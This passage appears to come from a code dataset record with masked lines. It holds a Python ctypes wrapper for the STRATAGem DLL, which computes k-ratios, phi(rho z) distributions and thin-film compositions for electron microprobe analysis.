get k-ratio')\n 
kratios.setdefault(experiment, []).append(k_.value)\n return thicknesses, kratios\n <mask token>\n\n @_check_key\n def compute_kratios(self):\n \"\"\"\n Computes the k-ratios of the different experiments.\n \n :return: :class:`dict` where the keys are experiments (as defined by\n :meth:`.add_experiment`) and the values are k-ratios \n (:class:`float`).\n \"\"\"\n if len(self._layers) == 0:\n return self._compute_kratios_substrate()\n else:\n return self._compute_kratios_multilayers()\n\n @_check_key\n def _compute_kratios_multilayers(self):\n \"\"\"\n Internal method to compute the k-ratios using the \n :meth:`compute_kratio_vs_thickness`.\n \"\"\"\n for i, layer in enumerate(self._layers.keys()):\n if not layer.is_thickness_known():\n raise ValueError('Thickness of layer %i is unknown' % i)\n layer = list(self._layers.keys())[0]\n thickness_low_m = layer.thickness_m\n thickness_high_m = layer.thickness_m * 10\n step = 1\n _thicknesses, kratios = self.compute_kratio_vs_thickness(layer,\n thickness_low_m, thickness_high_m, step)\n output = {}\n for experiment, kratio in kratios.items():\n output.setdefault(experiment, kratio[0])\n return output\n <mask token>\n\n @_check_key\n def compute(self, iteration_max=50):\n \"\"\"\n Computes the unknown composition(s) and thickness(es) in the specified\n sample.\n \n :arg iteration_max: maximum number of iterations of the solve\n (default: 50)\n :type iteration_max: :class:`int`\n \n :return: calculated sample\n :rtype: :class:`.Sample`\n \"\"\"\n zs = set(exp.z for exp in self._experiments.keys())\n for layer in (list(self._layers.keys()) + [self._substrate[0]]):\n for z, wf in layer.composition.items():\n if z in zs:\n continue\n if wf is None:\n continue\n logger.debug('Added dummy experiment for z=%i', z)\n exp = Experiment(z, LINE_KA, 0.0, analyzed=False)\n self.add_experiment(exp)\n iteration_max_ = c.c_int(iteration_max)\n logger.debug('StSetMaxNbIter(%i)', iteration_max)\n self._lib.StSetMaxNbIter(iteration_max_)\n 
logger.debug('StComputeIterpStart(key)')\n if not self._lib.StComputeIterpStart(self._key):\n self._raise_error('Cannot start iteration')\n continue_ = c.c_bool(True)\n iteration = 0\n logger.debug('Start iteration')\n while True:\n iteration += 1\n logger.debug('Iteration #%i' % iteration)\n logger.debug('StComputeIterpNext(key, %r)' % continue_.value)\n if not self._lib.StComputeIterpNext(self._key, c.byref(continue_)):\n break\n if not continue_.value:\n break\n logger.debug('Iteration completed')\n thick_known = c.c_bool()\n mass_thickness = c.c_double()\n thickness = c.c_double()\n density = c.c_double()\n\n def get_layer(layer, ilayer):\n ilayer_ = c.c_int(ilayer)\n logger.debug('StSdGetNbElts(key, %i)' % ilayer)\n nbelt = self._lib.StSdGetNbElts(self._key, ilayer_)\n if nbelt == -1:\n self._raise_error('Cannot get number of elements')\n flag_ = (c.c_int * nbelt)()\n wfs_ = (c.c_double * nbelt)()\n logger.debug('StSdGetLayRawConcs(key, %i, flag, wfs)' % ilayer)\n if not self._lib.StSdGetLayRawConcs(self._key, ilayer_, flag_, wfs_\n ):\n self._raise_error('Cannot get layer concentration')\n composition = {}\n for z in layer.composition.keys():\n nra_ = c.c_int(z)\n logger.debug('StSdGetEltIdx(key, %i, %i)' % (ilayer, z))\n zindex = self._lib.StSdGetEltIdx(self._key, ilayer_, nra_)\n composition[z] = wfs_[zindex]\n logger.debug('StSdGetThick(key, %i)', ilayer)\n if not self._lib.StSdGetThick(self._key, ilayer_, c.byref(\n thick_known), c.byref(mass_thickness), c.byref(thickness),\n c.byref(density)):\n self._raise_error('Cannot get thickness')\n return (composition, thickness.value / 10000000000.0, \n mass_thickness.value * 10.0, density.value * 1000.0)\n sample = Sample(get_layer(*self._substrate)[0])\n for layer, ilayer in self._layers.items():\n sample.add_layer(*get_layer(layer, ilayer))\n return sample\n\n @_check_key\n def compute_prz(self, maxdepth_m=None, bins=100):\n \"\"\"\n Compute :math:`\\\\phi(\\\\rho z)` of all experiments.\n \n .. 
warning:: Only available for substrate (no layers).\n \n :arg maxdepth_m: maximum depth of the :math:`\\\\phi(\\\\rho z)` \n distribution in meters. If ``None``, Kanaya-Okayama electron range\n is used with a safety factor of 1.5.\n :type maxdepth_m: :class:`float`\n \n :arg bins: number of bins in the :math:`\\\\phi(\\\\rho z)` distribution\n :type bins: :class:`int`\n \n :return: a :class:`dict` where the keys are the experiments and the \n values are a tuple containing three lists:\n \n * :math:`\\\\rho z` coordinates (in g/cm2)\n * generated intensities of :math:`\\\\phi(\\\\rho z)` (no absorption)\n * emitted intensites of :math:`\\\\phi(\\\\rho z)`\n \"\"\"\n if len(self._layers) > 0:\n raise RuntimeError('PRZ can only be computed for substrate')\n hvs_eV = map(attrgetter('energy_eV'), self._experiments.keys())\n maxhv_eV = max(hvs_eV)\n maxhv_ = c.c_double(maxhv_eV / 1000.0)\n logger.debug('StSetScaleHV(%s)', maxhv_eV / 1000.0)\n self._lib.StSetScaleHV(maxhv_)\n logger.debug('StComputePrz(key)')\n if not self._lib.StComputePrz(self._key):\n self._raise_error('Cannot compute prz')\n przs = {}\n for experiment, indexes in self._experiments.items():\n if maxdepth_m is None:\n maxdepth_m = 0.0\n energy_keV = experiment.energy_eV / 1000.0\n for z, fraction in self._substrate[0].composition.items():\n dr = 0.0276 * atomic_mass_kg_mol(z\n ) * 1000.0 * energy_keV ** 1.67 / (z ** 0.89 *\n mass_density_kg_m3(z) / 1000.0)\n maxdepth_m += fraction / (dr * 1e-06)\n maxdepth_m = 1.0 / maxdepth_m\n maxdepth_m *= 1.5\n increment_kg_m2 = maxdepth_m * self._substrate[0\n ].density_kg_m3 / bins\n ielt_ = c.c_int(indexes[0])\n iline_ = c.c_int(indexes[1])\n ihv_ = c.c_int(0)\n rzs = []\n ys_generated = []\n ys_emitted = []\n for i in range(bins):\n rz_ = c.c_double(i * increment_kg_m2 * 0.1)\n rzs.append(i * increment_kg_m2)\n y_ = c.c_double()\n bUseExp_ = c.c_bool(True)\n self._lib.StPhiRhoZ(self._key, ielt_, iline_, ihv_, rz_,\n bUseExp_, c.byref(y_))\n 
ys_emitted.append(y_.value)\n y_ = c.c_double()\n bUseExp_ = c.c_bool(False)\n self._lib.StPhiRhoZ(self._key, ielt_, iline_, ihv_, rz_,\n bUseExp_, c.byref(y_))\n ys_generated.append(y_.value)\n przs.setdefault(experiment, (rzs, ys_generated, ys_emitted))\n return przs\n",
"step-3": "<mask token>\nlogger = logging.getLogger(__name__)\n<mask token>\ntry:\n import winreg\nexcept ImportError:\n try:\n import _winreg as winreg\n except ImportError:\n\n\n class winreg:\n HKEY_CURRENT_USER = None\n\n\n class _PyHKEY(object):\n\n def __enter__(self):\n return self\n\n def __exit__(self, exc_type, exc_value, traceback):\n pass\n\n def OpenKey(self, key, sub_key, res, sam):\n return self._PyHKEY()\n\n def QueryValueEx(self, key, value_name):\n return None\n<mask token>\n_REGISTRY_KEY = 'Software\\\\SAMx\\\\Stratagem\\\\Configuration'\n_REGISTRY_VALUENAME = 'InstallOEMDirectory'\nPRZMODE_XPP = 0\n<mask token>\nPRZMODE_PAP = 1\n<mask token>\nPRZMODE_GAU = 2\n<mask token>\nFLUORESCENCE_NONE = 0\n<mask token>\nFLUORESCENCE_LINE = 1\n<mask token>\nFLUORESCENCE_LINE_CONT = 2\n<mask token>\n_CONCENTRATION_FLAG_KNOWN = 0\n_CONCENTRATION_FLAG_UNKNOWN = 1\n_CONCENTRATION_FLAG_STOICHIOMETRIC = 2\n_CONCENTRATION_FLAG_TRACE = 3\n_CONCENTRATION_FLAG_DIFFERENCE = 4\n\n\nclass StratagemError(Exception):\n \"\"\"\n Exception raised for all errors related to the STRATAGem interface.\n \"\"\"\n pass\n\n\ndef _check_key(method):\n\n @functools.wraps(method)\n def wrapper(self, *args, **kwargs):\n if self._key is None:\n raise StratagemError('Not initialize. Call init().')\n return method(self, *args, **kwargs)\n return wrapper\n\n\nclass Stratagem:\n \"\"\"\n Main interface establishing a connection to the STRATAGem OEM interface and\n perform calculations using SAMx's STRATAGem.\n It is highly recommended to use :class:`Stratagem` as a context manager \n (i.e. ``with`` statement) to ensure that the connection to the DLL is \n properly closed.\n For instance::\n \n >>> with Stratagem() as strata:\n ... 
strata.prz_mode = PRZMODE_XPP\n \n Otherwise the following series of method must be called::\n \n >>> strata = Stratagem()\n >>> strata.init()\n >>> strata.prz_mode = PRZMODE_XPP\n >>> strata.close()\n \"\"\"\n\n def __init__(self, dll_path=None, display_error=True):\n \"\"\"\n :arg dll_path: complete path to the location of ``stratadllogger.dll``\n (optional). If ``None``, the path is found in the Windows registry\n under ``Software\\\\SAMx\\\\Stratagem\\\\Configuration``. If the DLL is not\n found a :class:`StratagemError` is raised.\n :type dll_path: :class:`str`\n \n :arg display_error: whether to display a message dialog on error\n :type display_error: :class:`bool`\n \"\"\"\n if dll_path is None:\n with winreg.OpenKey(winreg.HKEY_CURRENT_USER, _REGISTRY_KEY\n ) as key:\n basedir = winreg.QueryValueEx(key, _REGISTRY_VALUENAME)[0]\n dll_path = os.path.join(basedir, 'bin', 'stratadll.dll')\n cwd = os.getcwd()\n try:\n logger.debug('dll=%s', dll_path)\n self._lib = c.WinDLL(dll_path)\n finally:\n os.chdir(cwd)\n logger.debug('StEnableErrorDisplay(%r)', display_error)\n self._lib.StEnableErrorDisplay(c.c_bool(display_error))\n self._key = None\n self._cwd = os.getcwd()\n self._layers = {}\n self._substrate = None\n self._experiments = {}\n self._tmpstandards = []\n\n def __enter__(self):\n self.init()\n return self\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n self.close()\n return False\n\n def _stobjectnew(self, key=None, standard=False):\n if key is None:\n characters = string.ascii_lowercase\n key = ''.join(random.choice(characters) for _ in range(8))\n key = key.encode('ascii')\n if not isinstance(key, c.c_byte):\n key = c.create_string_buffer(key)\n bnormal_ = c.c_bool(not standard)\n iniflags_ = c.c_int(0)\n logger.debug('StObjectNew(key, %r, %i)', not standard, 0)\n if not self._lib.StObjectNew(key, bnormal_, iniflags_):\n self._raise_error('Cannot create object')\n return key\n\n def _raise_error(self, alternate=''):\n \"\"\"\n Raises a 
:class:`StratagemError`. \n The error code and message of known errors are retrieved from STRATAGem. \n If this is not possible, *alternate* is used as the error message.\n \"\"\"\n errnum_ = c.c_ulong()\n errtype_ = c.c_int()\n self._lib.StGetLastError(c.byref(errnum_), c.byref(errtype_))\n if errnum_.value != 0:\n if errtype_.value == 0:\n buf_ = c.create_string_buffer(256)\n self._lib.StGetMsg(errnum_, buf_, 256)\n raise StratagemError(buf_.value.decode('ascii'))\n elif errtype_.value == 1:\n raise c.WinError(errtype_.value)\n else:\n raise StratagemError('Error %i' % errnum_.value)\n else:\n raise StratagemError(alternate)\n\n def init(self):\n \"\"\"\n Initializes and setups STRATAGem.\n It does not have to be used if :class:`Stratagem` is used as a context\n manager.\n \"\"\"\n if self._key is not None:\n raise RuntimeError('Already initialized. Call close() first.')\n self._key = self._stobjectnew()\n self._cwd = os.getcwd()\n self.reset()\n\n def close(self):\n \"\"\"\n Closes the connection to the STRATAGem DLL.\n It does not have to be used if :class:`Stratagem` is used as a context\n manager.\n \"\"\"\n if self._key is not None:\n logger.debug('StObjectDelete(key)')\n self._lib.StObjectDelete(self._key)\n self._key = None\n for filepath in self._tmpstandards:\n os.remove(filepath)\n logger.debug('Remove temporary standard: %s', filepath)\n self.reset()\n\n def reset(self):\n \"\"\"\n Resets all parameters to the defaults, remove all experiments and sample.\n \"\"\"\n if self._key:\n self._lib.StObjectReset(self._key)\n os.chdir(self._cwd)\n self._layers.clear()\n self._substrate = None\n self._experiments.clear()\n self._tmpstandards.clear()\n\n @_check_key\n def set_sample(self, sample):\n \"\"\"\n Sets the sample, which will be used in all subsequent calculations.\n Note that only one sample can be defined.\n \n :arg sample: sample definition\n :type sample: :class:`Sample`\n \"\"\"\n self.reset()\n for layer in sample.layers:\n index = 
self._add_layer(layer, substrate=False)\n self._layers.setdefault(layer, index)\n index = self._add_layer(sample.substrate, substrate=True)\n self._substrate = sample.substrate, index\n\n @_check_key\n def get_sample(self):\n \"\"\"\n Returns the current sample. \n It can correspond to the sample defined by :meth:`set_sample` or the\n sample resulting from the computations (see :meth:`compute`).\n \n .. note:: a new sample is returned every time this method is called\n \n :return: current sample\n :rtype: :class:`Sample`\n \"\"\"\n sample = Sample(self._substrate[0].composition)\n for layer in self._layers:\n sample.add_layer(layer.composition, layer.thickness_m, layer.\n mass_thickness_kg_m2, layer.density_kg_m3)\n return sample\n sample = property(get_sample, set_sample, doc='Property to set/get sample')\n\n def _add_layer(self, layer, substrate=False, key=None):\n \"\"\"\n Internal method to add a layer from top to bottom. \n The last layer added is considered as the substrate.\n \n :arg layer: layer\n :type layer: :class:`.Layer`\n \n :return: index of the layer\n \"\"\"\n if key is None:\n key = self._key\n logger.debug('StSdAddLayer(key)')\n ilayer_ = self._lib.StSdGetNbLayers(key)\n logger.debug('StSdAddLayer(key, %i)', ilayer_)\n if not self._lib.StSdAddLayer(key, ilayer_):\n self._raise_error('Cannot add layer')\n for i, value in enumerate(layer.composition.items()):\n ielt_ = c.c_int(i)\n logger.debug('StSdAddElt(key, %i, %i)', ilayer_, i)\n if not self._lib.StSdAddElt(key, ilayer_, ielt_):\n self._raise_error('Cannot add element')\n z, wf = value\n nra_ = c.c_int(z)\n logger.debug('StSdSetNrAtom(key, %i, %i, %i)', ilayer_, i, z)\n if not self._lib.StSdSetNrAtom(key, ilayer_, ielt_, nra_):\n self._raise_error('Cannot set atomic number')\n if wf is None or wf == CONC_UNKNOWN:\n flag = _CONCENTRATION_FLAG_UNKNOWN\n elif wf == CONC_DIFF:\n flag = _CONCENTRATION_FLAG_DIFFERENCE\n else:\n flag = _CONCENTRATION_FLAG_KNOWN\n wf_ = c.c_double(wf)\n 
logger.debug('StSdSetConc(key, %i, %i, %f)', ilayer_, i, wf)\n if not self._lib.StSdSetConc(key, ilayer_, ielt_, wf_):\n self._raise_error('Cannot set concentration')\n logger.debug('StSdSetConcFlag(key, %i, %i, %i)', ilayer_, i, flag)\n if not self._lib.StSdSetConcFlag(key, ilayer_, ielt_, c.c_int(flag)\n ):\n self._raise_error('Cannot set concentration flag')\n if not substrate:\n thick_known = layer.is_thickness_known()\n thick_known_ = c.c_bool(thick_known)\n if layer.is_density_known():\n density = layer.density_kg_m3 / 1000.0\n else:\n density = 10.0\n density_ = c.c_double(density)\n if thick_known:\n thickness = layer.thickness_m * 10000000000.0\n mass_thickness = layer.mass_thickness_kg_m2 * 0.1\n else:\n thickness = 0.0\n mass_thickness = 0.0\n thickness_ = c.c_double(thickness)\n mass_thickness_ = c.c_double(mass_thickness)\n logger.debug('StSdSetThick(key, %i, %r, %d, %d, %d)', ilayer_,\n thick_known, mass_thickness, thickness, density)\n if not self._lib.StSdSetThick(key, ilayer_, thick_known_,\n mass_thickness_, thickness_, density_):\n self._raise_error('Cannot set thickness')\n return int(ilayer_)\n\n def _create_standard(self, standard):\n \"\"\"\n Internal method to create a new object defining the standard \n :class:`.Sample`.\n \"\"\"\n key_ = self._stobjectnew(standard=True)\n for layer in standard.layers:\n self._add_layer(layer, substrate=False, key=key_)\n self._add_layer(standard.substrate, substrate=True, key=key_)\n filename = key_.value.decode('ascii') + '.tfs'\n filepath = os.path.join(self.get_standard_directory(), filename)\n filepath_ = c.create_string_buffer(filepath.encode('ascii'))\n logger.debug('StObjectWriteFile(key, %s)', filepath)\n if not self._lib.StObjectWriteFile(key_, filepath_):\n self._raise_error('Cannot save standard')\n self._lib.StObjectDelete(key_)\n self._tmpstandards.append(filepath)\n return filepath\n\n @_check_key\n def add_experiment(self, experiment):\n \"\"\"\n Adds an experiment, i.e. 
measurements of k-ratio at different energies.\n \n .. hint:: Use :meth:`reset` method to remove defined experiments.\n \n :arg experiment: experiment\n :type experiment: :class:`Experiment`\n \"\"\"\n nra_ = c.c_int(experiment.z)\n klm_ = c.c_int(experiment.line)\n hv_ = c.c_double(experiment.energy_eV / 1000.0)\n ielt_ = c.c_int()\n iline_ = c.c_int()\n iexpk_ = c.c_int()\n logger.debug('StEdAddNrAtomLineHV(key, %i, %i)', experiment.z,\n experiment.line)\n if not self._lib.StEdAddNrAtomLineHV(self._key, nra_, klm_, hv_, c.\n byref(ielt_), c.byref(iline_), c.byref(iexpk_)):\n self._raise_error('Cannot add atomic number and line')\n standard = experiment.standard\n if isinstance(standard, Sample):\n standard = self._create_standard(standard)\n standard_ = c.create_string_buffer(standard.encode('ascii'))\n logger.debug('StEdSetLine(key, %i, %i, %i, %s)', ielt_.value,\n iline_.value, klm_.value, standard)\n if not self._lib.StEdSetLine(self._key, ielt_, iline_, klm_, standard_\n ):\n self._raise_error('Cannot set standard')\n analyzed = experiment.is_analyzed()\n analyzed_ = c.c_bool(analyzed)\n logger.debug('StEdSetAnalyzedFlag(key, %i, %r)', ielt_.value, analyzed)\n if not self._lib.StEdSetAnalyzedFlag(self._key, ielt_, analyzed_):\n self._raise_error('Cannot add experiment analyzed flag')\n kratio_ = c.c_double(experiment.kratio)\n logger.debug('StEdSetExpK(key, %i, %i, %i, %f, %f, %f, 0.0, 2)',\n ielt_.value, iline_.value, iexpk_.value, experiment.energy_eV /\n 1000.0, experiment.energy_eV / 1000.0, experiment.kratio)\n if not self._lib.StEdSetExpK(self._key, ielt_, iline_, iexpk_, hv_,\n hv_, kratio_, c.c_double(0.0), c.c_int(2)):\n self._raise_error('Cannot set experiment k-ratio')\n if experiment.is_analyzed():\n indexes = ielt_.value, iline_.value, iexpk_.value\n self._experiments.setdefault(experiment, indexes)\n\n @_check_key\n def add_experiments(self, *exps):\n \"\"\"\n Adds several experiments::\n \n >>> strata.add_experiments(exp1, exp2, exp3)\n 
\"\"\"\n for exp in exps:\n self.add_experiment(exp)\n\n def get_experiments(self):\n \"\"\"\n Returns a :class:`tuple` of all defined experiments.\n \n :rtype: :class:`tuple`\n \"\"\"\n return tuple(self._experiments.keys())\n\n @_check_key\n def set_geometry(self, toa, tilt, azimuth):\n \"\"\"\n Sets the geometry.\n \n :arg toa: take off angle (in radians)\n :arg tilt: tilt angle (in radians)\n :arg azimuth: azimuthal angle (in radians)\n \"\"\"\n toa_ = c.c_double(toa)\n tilt_ = c.c_double(tilt)\n azimuth_ = c.c_double(azimuth)\n logger.debug('StSetGeomParams(key, %f, %f, %f)', toa, tilt, azimuth)\n if not self._lib.StSetGeomParams(self._key, toa_, tilt_, azimuth_):\n self._raise_error('Cannot set geometry parameters')\n\n @_check_key\n def get_geometry(self):\n \"\"\"\n Returns the geometry.\n \n :return: take off angle (in radians), tilt angle (in radians),\n azimuthal angle (in radians)\n \"\"\"\n toa_ = c.c_double()\n tilt_ = c.c_double()\n azimuth_ = c.c_double()\n logger.debug('StGetGeomParams(key)')\n if not self._lib.StGetGeomParams(self._key, c.byref(toa_), c.byref(\n tilt_), c.byref(azimuth_)):\n self._raise_error('Cannot get geometry parameters')\n return toa_.value, tilt_.value, azimuth_.value\n geometry = property(get_geometry, doc='Property to get geometry')\n\n @_check_key\n def set_prz_mode(self, mode):\n \"\"\"\n Sets the type of model to use for the :math:`\\\\phi(\\\\rho z)`.\n \n :arg mode: type of model, either\n \n * :data:`PRZMODE_XPP`\n * :data:`PRZMODE_PAP`\n * :data:`PRZMODE_GAU`\n :type mode: :class:`int`\n \"\"\"\n mode_ = c.c_int(mode)\n logger.debug('StSetPrzMode(%i)', mode)\n self._lib.StSetPrzMode(mode_)\n\n @_check_key\n def get_prz_mode(self):\n \"\"\"\n Returns the type of model to use for the :math:`\\\\phi(\\\\rho z)`.\n \n :return: either :data:`PRZMODE_XPP`, :data:`PRZMODE_PAP` or \n :data:`PRZMODE_GAU`\n :rtype: :class:`int`\n \"\"\"\n return self._lib.StGetPrzMode()\n prz_mode = property(get_prz_mode, set_prz_mode, doc=\n 
'Property to get/set prz mode')\n\n @_check_key\n def set_fluorescence(self, flag):\n \"\"\"\n Sets the fluorescence flag.\n \n :arg flag: either \n \n * :data:`FLUORESCENCE_NONE`\n * :data:`FLUORESCENCE_LINE`\n * :data:`FLUORESCENCE_LINE_CONT`\n :type flag: :class:`int`\n \"\"\"\n flag_ = c.c_int(flag)\n logger.debug('StSetFluorFlg(%i)', flag)\n self._lib.StSetFluorFlg(flag_)\n\n @_check_key\n def get_fluorescence(self):\n \"\"\"\n Returns the fluorescence flag.\n \n :return: either :data:`FLUORESCENCE_NONE`, :data:`FLUORESCENCE_LINE`\n or :data:`FLUORESCENCE_LINE_CONT`\n :rtype: :class:`int`\n \"\"\"\n return self._lib.StGetFluorFlg()\n fluorescence = property(get_fluorescence, set_fluorescence, doc=\n 'Property to get/set fluorescence')\n\n @_check_key\n def set_standard_directory(self, dirpath):\n \"\"\"\n Sets the directory where standard files are stored.\n \n :arg dirpath: path to directory\n :type dirpath: :class:`str`\n \"\"\"\n dirpath_ = c.create_string_buffer(dirpath.encode('ascii'))\n self._lib.StSetDirectory(c.c_int(1), dirpath_)\n\n @_check_key\n def get_standard_directory(self):\n \"\"\"\n Returns the directory where standard files are stored.\n \n :rtype: :class:`str`\n \"\"\"\n dirpath = (c.c_char * 256)()\n self._lib.StGetDirectory(c.c_int(1), c.byref(dirpath), 256)\n return dirpath.value.decode('ascii')\n standard_directory = property(get_standard_directory,\n set_standard_directory, doc='Property to get/set standard directory')\n\n @_check_key\n def compute_kratio_vs_thickness(self, layer, thickness_low_m,\n thickness_high_m, step):\n \"\"\"\n Computes the variation of the k-ratio as a function of the thickness \n for a layer.\n \n :arg layer: layer of a sample (must have been previously added)\n :type layer: :class:`.Layer`\n \n :arg thickness_low_m: lower limit of the thickness in meters\n :type thickness_low_m: :class:`float`\n \n :arg thickness_high_m: upper limit of the thickness in meters\n :type thickness_high_m: :class:`float`\n \n :arg 
step: number of steps\n :type step: :class:`int`\n \n :return: :class:`tuple` containing\n \n * :class:`list` of thicknesses\n * :class:`dict` where the keys are experiments (as defined by\n :meth:`.add_experiment`) and the values are :class:`list` \n containing k-ratios for each thickness\n \"\"\"\n logger.debug('StSetKvsThicknessUnit(2)')\n self._lib.StSetKvsThicknessUnit(2)\n if layer not in self._layers:\n raise ValueError('Unknown layer')\n ilayer = self._layers[layer]\n ilayer_ = c.c_int(ilayer)\n step_ = c.c_int(step)\n logger.debug('StSetNbComputedHV(%i)', step)\n self._lib.StSetNbComputedHV(step_)\n low_ = c.c_double(thickness_low_m * 1000000000.0)\n high_ = c.c_double(thickness_high_m * 1000000000.0)\n logger.debug('StComputeKvsThickness(key, %i, %f, %f)', ilayer, \n thickness_low_m * 1000000000.0, thickness_high_m * 1000000000.0)\n if not self._lib.StComputeKvsThickness(self._key, ilayer_, low_, high_\n ):\n self._raise_error('Cannot compute k-ratio vs thickness')\n thicknesses = []\n kratios = {}\n thick_ = c.c_double()\n k_ = c.c_double()\n for i in range(step + 1):\n i_ = c.c_int(i)\n if not self._lib.StGetKvsT_Thick(self._key, i_, c.byref(thick_)):\n self._raise_error('Cannot get thickness')\n thicknesses.append(thick_.value)\n for experiment, indexes in self._experiments.items():\n ielt_ = c.c_int(indexes[0])\n iline_ = c.c_int(indexes[1])\n iHv_ = c.c_int(indexes[2])\n if not self._lib.StGetKvsT_K(self._key, i_, ielt_, iline_,\n iHv_, c.byref(k_)):\n self._raise_error('Cannot get k-ratio')\n kratios.setdefault(experiment, []).append(k_.value)\n return thicknesses, kratios\n\n @_check_key\n def compute_kratio_vs_energy(self, energy_high_eV, step):\n \"\"\"\n Computes the variation of the k-ratio as a function of the incident\n energy. 
\n Note that the computation also starts at 0 keV up to the specified energy.\n \n :arg energy_high_eV: upper limit of the thickness in electronvolts\n :type energy_high_eV: :class:`float`\n \n :arg step: number of steps\n :type step: :class:`int`\n \n :return: :class:`tuple` containing\n \n * :class:`list` of energies in electronvolts\n * :class:`dict` where the keys are experiments (as defined by\n :meth:`.add_experiment`) and the values are :class:`list` \n containing k-ratios for each energy\n \"\"\"\n step_ = c.c_int(step)\n logger.debug('StSetNbComputedHV(%i)', step)\n self._lib.StSetNbComputedHV(step_)\n energy_ = c.c_double(energy_high_eV / 1000.0)\n logger.debug('StSetMaxHV(%f)' % (energy_high_eV / 1000.0,))\n self._lib.StSetMaxHV(energy_)\n logger.debug('StComputeKvsHV(key)')\n if not self._lib.StComputeKvsHV(self._key):\n self._raise_error('Cannot compute k-ratio vs energy')\n energies = []\n kratios = {}\n k_ = c.c_double()\n bHV_ = c.c_bool(True)\n increment = float(energy_high_eV / 1000.0) / step\n for i in range(step + 1):\n hv = i * increment\n hv_ = c.c_double(hv)\n for experiment, indexes in self._experiments.items():\n ielt_ = c.c_int(indexes[0])\n iline_ = c.c_int(indexes[1])\n if not self._lib.StKvsHvOrRx(self._key, ielt_, iline_, hv_,\n bHV_, c.byref(k_)):\n self._raise_error('Cannot get k-ratio')\n kratios.setdefault(experiment, []).append(k_.value)\n energies.append(hv)\n return energies, kratios\n\n @_check_key\n def compute_kratios(self):\n \"\"\"\n Computes the k-ratios of the different experiments.\n \n :return: :class:`dict` where the keys are experiments (as defined by\n :meth:`.add_experiment`) and the values are k-ratios \n (:class:`float`).\n \"\"\"\n if len(self._layers) == 0:\n return self._compute_kratios_substrate()\n else:\n return self._compute_kratios_multilayers()\n\n @_check_key\n def _compute_kratios_multilayers(self):\n \"\"\"\n Internal method to compute the k-ratios using the \n :meth:`compute_kratio_vs_thickness`.\n 
\"\"\"\n for i, layer in enumerate(self._layers.keys()):\n if not layer.is_thickness_known():\n raise ValueError('Thickness of layer %i is unknown' % i)\n layer = list(self._layers.keys())[0]\n thickness_low_m = layer.thickness_m\n thickness_high_m = layer.thickness_m * 10\n step = 1\n _thicknesses, kratios = self.compute_kratio_vs_thickness(layer,\n thickness_low_m, thickness_high_m, step)\n output = {}\n for experiment, kratio in kratios.items():\n output.setdefault(experiment, kratio[0])\n return output\n\n @_check_key\n def _compute_kratios_substrate(self):\n \"\"\"\n Internal method to compute the k-ratios using the \n :meth:`compute_kratio_vs_energy`.\n \"\"\"\n output = {}\n step = 2\n for experiment in self._experiments:\n energy_high_eV = experiment.energy_eV\n _energies, kratios = self.compute_kratio_vs_energy(energy_high_eV,\n step)\n kratio = kratios[experiment][-1]\n if kratio < 0:\n logger.warn(\n 'STRATAGem returns a negative k-ratio, re-try with energy + 1 eV'\n )\n _energies, kratios = self.compute_kratio_vs_energy(\n energy_high_eV + 1.0, step)\n kratio = kratios[experiment][-1]\n output.setdefault(experiment, kratio)\n return output\n\n @_check_key\n def compute(self, iteration_max=50):\n \"\"\"\n Computes the unknown composition(s) and thickness(es) in the specified\n sample.\n \n :arg iteration_max: maximum number of iterations of the solve\n (default: 50)\n :type iteration_max: :class:`int`\n \n :return: calculated sample\n :rtype: :class:`.Sample`\n \"\"\"\n zs = set(exp.z for exp in self._experiments.keys())\n for layer in (list(self._layers.keys()) + [self._substrate[0]]):\n for z, wf in layer.composition.items():\n if z in zs:\n continue\n if wf is None:\n continue\n logger.debug('Added dummy experiment for z=%i', z)\n exp = Experiment(z, LINE_KA, 0.0, analyzed=False)\n self.add_experiment(exp)\n iteration_max_ = c.c_int(iteration_max)\n logger.debug('StSetMaxNbIter(%i)', iteration_max)\n self._lib.StSetMaxNbIter(iteration_max_)\n 
logger.debug('StComputeIterpStart(key)')\n if not self._lib.StComputeIterpStart(self._key):\n self._raise_error('Cannot start iteration')\n continue_ = c.c_bool(True)\n iteration = 0\n logger.debug('Start iteration')\n while True:\n iteration += 1\n logger.debug('Iteration #%i' % iteration)\n logger.debug('StComputeIterpNext(key, %r)' % continue_.value)\n if not self._lib.StComputeIterpNext(self._key, c.byref(continue_)):\n break\n if not continue_.value:\n break\n logger.debug('Iteration completed')\n thick_known = c.c_bool()\n mass_thickness = c.c_double()\n thickness = c.c_double()\n density = c.c_double()\n\n def get_layer(layer, ilayer):\n ilayer_ = c.c_int(ilayer)\n logger.debug('StSdGetNbElts(key, %i)' % ilayer)\n nbelt = self._lib.StSdGetNbElts(self._key, ilayer_)\n if nbelt == -1:\n self._raise_error('Cannot get number of elements')\n flag_ = (c.c_int * nbelt)()\n wfs_ = (c.c_double * nbelt)()\n logger.debug('StSdGetLayRawConcs(key, %i, flag, wfs)' % ilayer)\n if not self._lib.StSdGetLayRawConcs(self._key, ilayer_, flag_, wfs_\n ):\n self._raise_error('Cannot get layer concentration')\n composition = {}\n for z in layer.composition.keys():\n nra_ = c.c_int(z)\n logger.debug('StSdGetEltIdx(key, %i, %i)' % (ilayer, z))\n zindex = self._lib.StSdGetEltIdx(self._key, ilayer_, nra_)\n composition[z] = wfs_[zindex]\n logger.debug('StSdGetThick(key, %i)', ilayer)\n if not self._lib.StSdGetThick(self._key, ilayer_, c.byref(\n thick_known), c.byref(mass_thickness), c.byref(thickness),\n c.byref(density)):\n self._raise_error('Cannot get thickness')\n return (composition, thickness.value / 10000000000.0, \n mass_thickness.value * 10.0, density.value * 1000.0)\n sample = Sample(get_layer(*self._substrate)[0])\n for layer, ilayer in self._layers.items():\n sample.add_layer(*get_layer(layer, ilayer))\n return sample\n\n @_check_key\n def compute_prz(self, maxdepth_m=None, bins=100):\n \"\"\"\n Compute :math:`\\\\phi(\\\\rho z)` of all experiments.\n \n .. 
